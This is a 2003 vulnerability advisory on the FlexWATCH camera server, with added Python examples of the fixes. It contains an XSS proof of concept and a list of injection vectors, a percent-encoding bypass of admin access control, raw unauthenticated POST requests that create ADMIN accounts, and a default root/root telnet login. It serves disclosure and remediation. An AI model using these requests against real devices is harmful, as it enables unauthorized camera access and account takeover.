
Security_FlexWATCH-2.txt

Posted Dec 15, 2003
Authored by Slaizer

The FlexWATCH surveillance camera server (tested: FlexWATCH-50 web ver 2.2, Build Nov 18 2003) is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, perform cross site scripting, and more.

tags | exploit, remote, web, vulnerability, xss
SHA-256 | 4934d0e7b56716500ef80132c3567024e4d6fe3186aa10eb1cec0cc51e6eb833

#=============================================================
# Unauthorized Access vulnerability in FlexWATCH camera Server
# Second Assault !
#=============================================================


Author: SLAIZER
mail: slaizer[at]phreaker.net

Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url : http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr

Product Version : FlexWATCH-50 Web Ver 2.2, tested Build Nov 18 2003

#====================
# Introduction
#====================

A few months ago I published another document explaining how to obtain full access
to the system quickly and easily.
That document was sent to SEYEON before it was published; since I got no response
from them, I decided to publish it. Two months after it was published,
SEYEON got in touch with me. They asked me to test a new system in which the bug
had already been patched, so that I could tell them which bugs I had found.
They demanded that I remove the company name from my previous document
and that I not publish anything more...
On top of that, they wanted me to do work for the company, with considerable economic
benefit to them, completely for free, which I do not accept. I will always be ready to help
whoever needs it for free, as long as nothing is demanded of me, and even less so where
proprietary software is involved. I'm sorry if that seems exaggerated, but nobody lives on air.


#===================
# Description
#===================

·Examining the new system:

slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80

HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <---------- :) the same everlasting banner
Date: Mon Dec 1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1


·In the previous version I did not examine which services were running, because I did not need to :P.

root@Necora:~$ nmap -sS -P0 victim
Interesting ports on victim (censored :P):

PORT STATE SERVICE
21/tcp open ftp <-------
23/tcp open telnet <------- Default user/pass are root/root :P
80/tcp open http <------- These are not very interesting right now either,
1024/tcp open kdm <------- but the nice thing would be to use SSL :P.
1755/tcp open wms <-------



·It's time to see web application :

·Browsing the web interface, we see that the system has changed a bit as regards the directory
tree, but otherwise it looks the same.

The first thing we run into is a bug in the page whose job is to notify us that the URL we
wanted to access does not exist (404 error): a piece of XSS :P.

Cross-Site Scripting .

Example :

mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>

Results :

Access Error: Page not found

when trying to obtain /hehe.html

cannot open URL /hehe.html

( The code executes perfectly; in fact it is executed twice.. hehe. So we get
two windows alerting us with the message -Security ? ).

View source :

<html>
<head>
<title>Document Error: Page not found</title>
</head>
<body>
<h2>Access Error: Page not found</h2>
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
</body>
</html>

Note:

This kind of method is well known as a way to gain access to the system by means of malicious
links that capture some user's identification (session or credentials):
document.write / document.cookie / document.location..


I list different methods of JavaScript injection, taken from Globbes Security Advisory #33:

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]


·The information the client sends to the server must always be validated. In this
case the most obvious solution is to make sure malicious characters are not inserted into the page,
for example by substituting them with their HTML entity equivalents.
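The fix just described, as an added example (Python, not code from the advisory or from the FlexWATCH firmware): the 404 page renders the requested path once the way the advisory shows it, and once with the untrusted value replaced by its HTML entity equivalents. The sample path is the one from the proof of concept above.

```python
# Added example (not code from the advisory or from the FlexWATCH firmware):
# a 404 page that reflects the requested path, first as the advisory shows it
# and then with the untrusted value substituted by its HTML entity equivalents.
import html

# Constructed sample input: the path from the advisory's proof of concept.
SAMPLE_PATH = "/hehe.html<h1><script>alert('Security ?');</script>"


def render_404_unsafe(path: str) -> str:
    """Reflect the raw path into the page body: the defect described above."""
    return (
        "<h2>Access Error: Page not found</h2>\n"
        f"when trying to obtain <b>{path}</b>\n"
        f"<br><p>Cannot open URL <b>{path}</b></p>"
    )


def render_404_safe(path: str) -> str:
    """Entity-encode the path (<, >, &, quotes) before it reaches the HTML body."""
    safe = html.escape(path, quote=True)
    return (
        "<h2>Access Error: Page not found</h2>\n"
        f"when trying to obtain <b>{safe}</b>\n"
        f"<br><p>Cannot open URL <b>{safe}</b></p>"
    )


def reflects_script(page: str) -> bool:
    """True if the page still carries a raw <script tag that a browser would execute."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_404_unsafe(SAMPLE_PATH))
    print("---")
    print(render_404_safe(SAMPLE_PATH))
```

Entity encoding is the right substitution for a value placed in HTML body text; a value placed inside an attribute, a script block or a URL needs the encoding appropriate to that context. Escaping must be the last step before output, so any percent-decoding the server does on the path beforehand does not reintroduce the problem.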




------------ u0xa ---------------



·Where I want to get to now is this URL: admin/aindex.htm .
That is where the system administration lives, so, trying things out and using a bit of
imagination, I check what happens when the request is sent with the path in hexadecimal (percent-encoded) format.

Example :



slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm

------------ Url encode to hex mode ----------------

http://victim/%61%64m%69n/a%69nde%78.%68t%6D

-----------------By SLAIZER tools ------------------

I obtain this in plain text:


------ code -----
<html>
<head>
<script language="Javascript">
onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
</frameset>
</head>
</html>
----- code -----



:D It's my friend the configuration frame, and it's in plain text ..
We are on the right track; let's see if we can do something with this.


slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm

------------ Url encode to hex mode ----------------

http://victim/adm%69%6E/%61%64%6D%69n.%68tm

-----------------By SLAIZER tools ------------------


This is where we are going to focus, so let's look at it!

Important links :

- Change Root Password configuration <---- /asp/pwdcfg.asp
- Add User <---- /asp/adduser.asp /* Let's go! */
- Delete User <---- /asp/deluser.asp
- Access Level <---- /asp/chglimit.asp



slaizer@Necora:~$ nc victim 80

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123
&passconf=root123&group=POWER_USER&enabled=on&ok=OK


----------- u0xa ------------

<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------



The POST seems to have gone through correctly, but when trying to log in it shows us this error straight away:

Access Error: Forbidden

When trying to obtain /admin/aindex.htm
Access Denied Prohibited User .

-------------------------------


foh.... but ... I can log in here:

http://victim/app/idxas.html <----- Camera Administration.

Login : slaizer
password: root123


|o_O| <- hehe !! We already have access to all the cameras!!! using the login slaizer with pass root123
that we added in the previous step. We have already taken a big step forward..


But... the solution is simpler than it seems.. the added user belongs to POWER_USER. Earlier,
a user like this was really more than sufficient, but it costs us nothing to do one more test and
add another user, this time in the ADMIN group:

Example

slaizer@Necora:~$ nc victim 80

POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p <----/*This is a /admin/asp/adduser.asp hex-encoded*/
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root
&passconf=123root&group=ADMIN&enabled=on&ok=OK




----------- u0xa ------------

<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>


----------- u0xa ------------

So far so good! .


I log in with rezials & password 123root and..... :D Congratulations! You are ADMIN!!!

You can now do whatever you want in the system!!!

The problem is that the /admin directory was no longer denying access to these users, as it
did previously.


#=========================
# Solution :
#=========================


Always validate the kind of request the client makes: as you can see, I have used a mixture of
hex-encoded and ASCII characters in the path.
The best solution is to create authenticated sessions and to allow access to such directories only
on the basis of the session.
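The two points of the solution, as an added example (Python, not code from the advisory or from the FlexWATCH firmware): an access check on the raw request path, which the hex-encoded URLs shown above slip past, beside one that canonicalizes the path first and then ties access to the group bound to the caller's session. The protected prefix /admin/ and the group names ADMIN and POWER_USER are taken from the advisory; everything else is assumed for the example.

```python
# Added example (not code from the advisory or from the FlexWATCH firmware):
# an access check on the raw request path, which percent-encoding slips past,
# beside one that canonicalizes the path first and ties access to the session's group.
import posixpath
from urllib.parse import unquote

# Assumption for this example: /admin/ is the directory the device restricts.
PROTECTED_PREFIXES = ("/admin/",)


def _is_under(path: str, prefix: str) -> bool:
    """Prefix test that also matches the directory itself ('/admin' as well as '/admin/x')."""
    return path == prefix.rstrip("/") or path.startswith(prefix)


def requires_admin_naive(raw_path: str) -> bool:
    """Check the path exactly as received; this is what the hex-encoded URL defeats."""
    return any(_is_under(raw_path, p) for p in PROTECTED_PREFIXES)


def canonicalize(raw_path: str) -> str:
    """Decode percent-escapes and collapse dot segments so every resource has one name."""
    path = raw_path.split("?", 1)[0]        # the query string plays no part in the decision
    path = unquote(path)                    # '%61%64m%69n' -> 'admin', '%2e%2e' -> '..'
    if "%" in path:                         # still encoded after one pass: refuse double encoding
        raise ValueError("double-encoded path")
    if "\x00" in path:                      # NUL bytes have no legitimate place in a URL path
        raise ValueError("NUL byte in path")
    # Leading slashes are collapsed before normpath, which would otherwise keep '//'.
    return posixpath.normpath("/" + path.lstrip("/"))   # resolves 'a/../b' and 'a//b'


def requires_admin(raw_path: str) -> bool:
    """Authorization decision made on the canonical path, never on the raw one."""
    path = canonicalize(raw_path)
    return any(_is_under(path, p) for p in PROTECTED_PREFIXES)


def authorize(raw_path: str, session_group):
    """Grant the request if the resource is unrestricted or the session belongs to ADMIN.

    session_group is the group the server bound to the caller's session when it
    logged in ("ADMIN", "POWER_USER", or None when unauthenticated); the group
    names are the ones seen in the advisory's POST bodies, the binding is assumed.
    """
    try:
        protected = requires_admin(raw_path)
    except ValueError:
        return False                        # malformed or ambiguous path: deny outright
    return (not protected) or session_group == "ADMIN"


if __name__ == "__main__":
    for url in ("/admin/aindex.htm", "/%61%64m%69n/a%69nde%78.%68t%6D", "/app/idxas.html"):
        print(url, "naive:", requires_admin_naive(url), "canonical:", requires_admin(url))
```

The decision is taken on the canonical form because the web server itself decodes the path before it looks up the file, so any check that runs on the raw string compares against a different name than the one that will be served. A path that is still percent-encoded after one decoding pass is refused rather than decoded again, so that the check and the file lookup can never disagree.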

/* Note : log in at www.flexwatch.com as technical e-mail support... xD */


#========================
# GreetSssSss!!!
#========================

- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu -

- kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD
[[Irc-Hispano : #boinasnegras , #ngsec]]
